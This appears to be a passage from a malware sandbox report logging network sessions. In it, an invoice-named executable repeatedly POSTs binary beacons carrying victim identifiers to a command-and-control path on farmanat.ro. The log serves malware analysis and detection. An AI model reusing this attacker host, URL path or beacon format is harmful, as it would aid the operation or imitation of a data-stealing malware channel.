Nov 25, 2021 10:53:29.843203068 CET	7194	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:29.876607895 CET	7194	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:29.926882029 CET	7195	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:28 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
633	192.168.11.20	50478	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:30.308855057 CET	7195	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:30.342288971 CET	7196	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:30.405215025 CET	7196	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
634	192.168.11.20	50479	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:30.786736012 CET	7197	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:30.820492029 CET	7197	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:30.869714975 CET	7197	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:29 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
635	192.168.11.20	50480	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:31.296933889 CET	7198	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:31.331038952 CET	7198	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:31.403213978 CET	7199	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
636	192.168.11.20	50481	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:31.808199883 CET	7199	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:31.841713905 CET	7200	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:31.902401924 CET	7200	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:30 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
637	192.168.11.20	50482	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:32.331859112 CET	7201	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:32.366100073 CET	7201	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:32.417025089 CET	7201	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
638	192.168.11.20	50483	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:32.797645092 CET	7202	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:32.830811024 CET	7202	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:32.903328896 CET	7203	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:31 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
639	192.168.11.20	50484	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:33.325393915 CET	7203	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:33.359611988 CET	7204	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:33.412101984 CET	7204	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
64	192.168.11.20	49900	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:41.968153000 CET	6398	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:42.001996994 CET	6398	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:42.053039074 CET	6398	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
640	192.168.11.20	50485	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:33.845489979 CET	7205	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:33.879756927 CET	7205	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:33.935188055 CET	7205	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
641	192.168.11.20	50486	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:34.266818047 CET	7206	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:34.300400019 CET	7206	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:34.350164890 CET	7207	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
642	192.168.11.20	50487	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:34.777721882 CET	7207	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:34.811966896 CET	7208	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:34.861690998 CET	7208	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
643	192.168.11.20	50488	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:35.308824062 CET	7209	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:35.343022108 CET	7209	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:35.395204067 CET	7209	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
644	192.168.11.20	50489	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:35.762264967 CET	7210	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:35.795502901 CET	7210	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:35.844363928 CET	7211	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
645	192.168.11.20	50490	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:36.258620024 CET	7211	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:36.293025970 CET	7212	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:36.343269110 CET	7212	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
646	192.168.11.20	50491	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:36.772211075 CET	7213	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:36.805632114 CET	7213	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:36.854226112 CET	7213	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
647	192.168.11.20	50492	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:37.268574953 CET	7214	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:37.302251101 CET	7214	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:37.351679087 CET	7215	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
648	192.168.11.20	50493	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:37.770351887 CET	7215	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:37.804538012 CET	7215	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:37.854489088 CET	7216	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
649	192.168.11.20	50494	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:38.269613981 CET	7217	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:38.303894043 CET	7217	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:53:38.353996992 CET	7217	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:53:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
65	192.168.11.20	49901	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:42.536148071 CET	6399	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:42.570441961 CET	6399	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:42.619992971 CET	6399	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
650	192.168.11.20	50495	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:53:38.709614038 CET	7218	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:53:38.742858887 CET	7218	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
